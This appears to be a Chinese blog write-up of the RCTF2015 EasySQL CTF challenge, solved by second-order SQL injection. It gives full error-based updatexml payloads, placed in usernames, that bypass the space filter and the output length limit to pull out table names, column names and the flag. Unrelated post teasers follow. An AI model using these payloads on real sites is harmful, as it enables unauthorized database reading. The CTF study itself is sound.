当前位置：首页 > news >正文

[RCTF2015]EasySQL ---不会编程的崽

news 2026/2/8 1:19:18

今天也是sql注入的新类型---二次注入。不得不说花样真的多哦。

既然真的是sql注入了。那就不测试其他地方了。现在注册进去看一下界面

单纯的回显了名字。源代码里发现user.php。

可以修改密码？二次注入应该就在用户名这里了。因为修改密码时，用户名会被带入sql执行，这时就可以绕过waf。测试了一下这里修改密码不会有回显提示，所以不能常规注入，盲注也不行。最后这里只能考虑报错注入。

然后查看闭合，注册用户名为单引号，修改密码时没报错，而双引号却报错了。这说明后端闭合是使用双引号。因为双引号造成了闭合错误。同时过滤了空格，使用括号绕过即可。

最后fuzz一下看看过滤了哪些吧。过滤如下：

没有伤到主体函数。直接开始注入

1.获取数据库

用户名:1"or(updatexml(1,concat(0x7e,database(),0x7e),1))#

然后登录去修改密码

ok哦，没毛病。继续注入表名。

用户名:1"or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='web_sqli'),0x7e),1))#

这里我就不卖关子了。ctf今典骗术，flag表。真的flag在users表里

用户名:1"or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e),1))#

很明显这里还限制回显长度。real_flag_1s_here才对。但是它又过滤了right，left，mid等函数。

还有一个函数reverse，倒过来输出。

用户名:1"or(updatexml(3,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e),3))#

reverse:把结果倒着输出

where(real_flag_1s_here)regexp('^f'):在这个列名的结果里匹配f开头的字符串

还是没打印完全。正向在匹配一次。把reverse删除即可

用户名:1"or(updatexml(3,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e),3))#

把flag整合一下就好了。

[RCTF2015]EasySQL ---不会编程的崽

今天也是sql注入的新类型---二次注入。不得不说花样真的多哦。既然真的是sql注入了。那就不测试其他地方了。现在注册进去看一下界面单纯的回显了名字。源代码里发现user.php。可以修改密码？二次注入应该就在用户名这里了。因为修改密码时，用户名会被…...

编程日记 2024/3/19 8:18:46

Memcached-分布式内存对象缓存系统

目录一、NoSQL 介绍二、Memcached 1、Memcached 介绍 1.1 Memcached 概念 1.2 Memcached 特性 1.3 Memcached 和 Redis 区别 1.4 Memcached 工作机制 1.4.1 内存分配机制 1.4.2 懒惰期 Lazy Expiration 1.4.3 LRU（最近最少使用算法） 1.4.4…...

编程日记 2024/3/19 8:13:41

bash: sqlplus: command not found 问题解决方法

一、问题描述在Linux中Oracle安装成功后，首次启动使用时，出现 sqlplus 命令不识别的问题，现象如下： $ sqlplus / as sysdba bash: sqlplus: command not found...二、问题分析查看环境变量是否正确配置： $ vim .ba…...

编程日记 2024/3/19 8:12:41

大模型-Prompt

一、prompt是什么在大型语言模型集成中，"prompt" 是指您向模型提供的输入文本或指令，以引导模型生成特定类型的响应。这个 prompt 可以是一个问题、一段描述、一个任务说明，甚至是一部分对话历史记录等。通过设计和优化 prompt&a…...

编程日记 2024/3/19 8:11:40

Python实战：SQLAlchemy ORM使用教程

一、SQLAlchemy ORM使用教程 SQLAlchemy是一个流行的Python SQL工具包和对象关系映射（ORM）框架，它为开发人员提供了一种高效、灵活的方式来与数据库进行交互。在本篇博客中，我们将深入探讨SQLAlchemy ORM的核心知识，并…...

编程日记 2024/3/19 8:08:37

能不能绕过c去学c++？

目前做工程开发，基本都是c/c混着用的，c/c是同源的，c/是在c的基础上发展起来的，它们之间有些联系和区别： 区别： 1.可用库不同 c基本是系统底层语言，一般系统底层开发用c（例如&…...

编程日记 2024/3/19 8:07:36

Python 小爬虫：爬取 bing 每日壁纸设为桌面壁纸

请求 URLJSON 版示例代码代码片段注意点headers 中的 User-Agent响应头中的 Content-Type终端通过代理API从 bing.com 找Bing 每日壁纸设置为桌面壁纸代码设定计划任务自动执行 python 脚本请求 URL 通过模仿必应（Bing）自己的 AJAX 调用方式获得请求 URL。 JSON 格式：...

编程日记 2024/3/19 8:06:34

利用textarea和white-space实现最简单的文章编辑器支持缩进和换行

当你遇到一个非常基础的文章发布和展示的需求，只需要保留换行和空格缩进，你是否会犹豫要使用富文本编辑器？实际上这个用原生的标签两步就能搞定！ 1.直接用textarea当编辑器 textarea本身就可以保存空格和换行符，示例如…...

编程日记 2024/3/19 8:05:33

总结mac下解决matplotlib中文显示问题的几种方法

一、前言： 使⽤matplotlib画图时，由于matplotlib默认没有中⽂，显⽰中文时会出现空⽩⼩⽅块。二、方法： 2.1 matplotlib中使用SimHei字体 1）进入终端后查看matplotlib的字体路径： $ python >>&g…...

编程日记 2024/3/19 8:03:32

探索区块链世界：从加密货币到去中心化应用

相信提到区块链，很多人会想到比特币这样的加密货币，但实际上，区块链技术远不止于此，它正在深刻地改变我们的生活和商业。首先，让我们来简单了解一下什么是区块链。区块链是一种分布式数据库技术，它通过将…...

编程日记 2024/3/19 8:00:29

GitLab/Github从头开始配置秘钥

1、下载git安装包 CNPM Binaries Mirrorhttps://registry.npmmirror.com/binary.html?pathgit-for-windows/ 拉到页面最底部选择点进文件夹下载32位或者64位的版本，我的是64位就选择64的版本进行安装 2、傻瓜式安装 3、在相应的文件夹右键选择 UserName为你的用…...

编程日记 2024/3/19 7:55:21

uni.getlocation h5获取定位失败后，阻塞问题

uni.getlocation 在H5中，如果用户未开gps定位或者gps定位信号较差时，定位会失败。这种情况uni.getlocation也不会出现报错，也不会有后续执行，导致代码阻塞，体验极差。解决方案1：拿不到定位或者定位失败这个…...

编程日记 2024/3/19 7:54:20

Flutter 运行 flutter doctor 命令长时间未响应

由于 Flutter 运行 flutter doctor 命令，会从 pub(https://pub.dev/ 类似于 Node.js 的 npm) 上进行资源的下载，如果没有配置国内镜像，可能会由于其服务器在国外导致资源下载慢或者下载不下来，所以出现了运行 flutter doctor 命令…...

编程日记 2024/3/19 7:53:18

【数据挖掘】练习2：数据管理2

课后作业2：数据管理2 一：上机实验2 # 编写函数stat，要求该函数同时计算均值，最大值，最小值，标准差，峰度和偏度。 install.packages("timeDate") library(timeDate) stat <- func…...

编程日记 2024/3/19 7:50:16

【iOS】——Blocks

文章目录前言一、Blocks概要1.什么是Blocks 二、Block模式1.block语法2.block类型变量3.截获自动变量值4._Block修饰符5.截获的自动变量三、Blocks的实现1.Block的实质2.截获自动变量值3._Block说明符4.Block存储域前言一、Blocks概要 1.什么是Blocks Blocks是C语言的扩…...

编程日记 2024/3/19 7:47:14

体验OceanBase OBD V2.5.0 组件内扩容和组件变更

背景 OBD 是OceanBase的命令行部署工具，在 obd V2.5.0 版本之前，其主要功能主要是部署各类组件，例如 oceanbase-ce,obproxy-ce,obagent 等。然而，它并不支持组件的变更操作以及组件内部的扩缩容调整。具体来说： 1、若…...

编程日记 2024/3/19 7:46:13

关于前端的学习

目录前言: 1.初识HTML: 1.1超文本: 1.2标记语言: 2.关于html的基本框架: 3.HTML基本文字标签: 3.1.h标题标签: 3.3 文本内容: 3.4换行的和分割的: 3.5 特殊文字标签: 3.5.1表面上看着三对的结果呈现都是一样的: 3.5.2但是其背后的效果其实是不一样的: 3.6转义字符:…...

编程日记 2024/3/19 7:45:12

DataX脚本告别手动编写，用大模型或Java代码自动生成

在离线数仓开发中，DataX支持多种数据源，性能好抽取速度快。美中不足的是，对需要抽取的每一张表都需要写配置文件，这样很繁琐和耗时。可以用大模型提示词来节省这方面的工作量。ChatGPT等大模型并不能很智能提供一个完全正确的，需要提供一个模板让它参考。方法1：用大模型…...

编程日记 2024/3/19 7:40:07

ASP.NET通过Appliaction和Session统计在人数和历史访问量

目录背景: Appliaction： Session： 过程： 数据库： Application_Start： Session_Start： Session_End： Application_End： 背景: 事件何时激发Application_Start在调用当前应用…...

编程日记 2024/3/19 7:39:06

在基于全志V851se的TinyVision上手动构建 Linux 6.1 + Debian 12 镜像

构建 SyterKit 作为 Bootloader SyterKit 是一个纯裸机框架，用于 TinyVision 或者其他 v851se/v851s/v851s3/v853 等芯片的开发板，SyterKit 使用 CMake 作为构建系统构建，支持多种应用与多种外设驱动。同时 SyterKit 也具有启动引导的功能&a…...

编程日记 2024/3/19 7:36:03

微软PowerBI考试 PL300-选择 Power BI 模型框架【附练习数据】

微软PowerBI考试 PL300-选择 Power BI 模型框架 20 多年来，Microsoft 持续对企业商业智能 (BI) 进行大量投资。 Azure Analysis Services (AAS) 和 SQL Server Analysis Services (SSAS) 基于无数企业使用的成熟的 BI 数据建模技术。同样的技术也是 Power BI 数据…...

编程新知 2026/2/1 19:08:45

从零实现富文本编辑器#5-编辑器选区模型的状态结构表达

先前我们总结了浏览器选区模型的交互策略，并且实现了基本的选区操作，还调研了自绘选区的实现。那么相对的，我们还需要设计编辑器的选区表达，也可以称为模型选区。编辑器中应用变更时的操作范围，就是以模型选区为基准来…...

编程新知 2026/1/16 16:34:26

一.入门案例启动类： package com.sky;import lombok.extern.slf4j.Slf4j; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.cache.annotation.EnableCach…...

编程新知 2026/2/2 0:35:08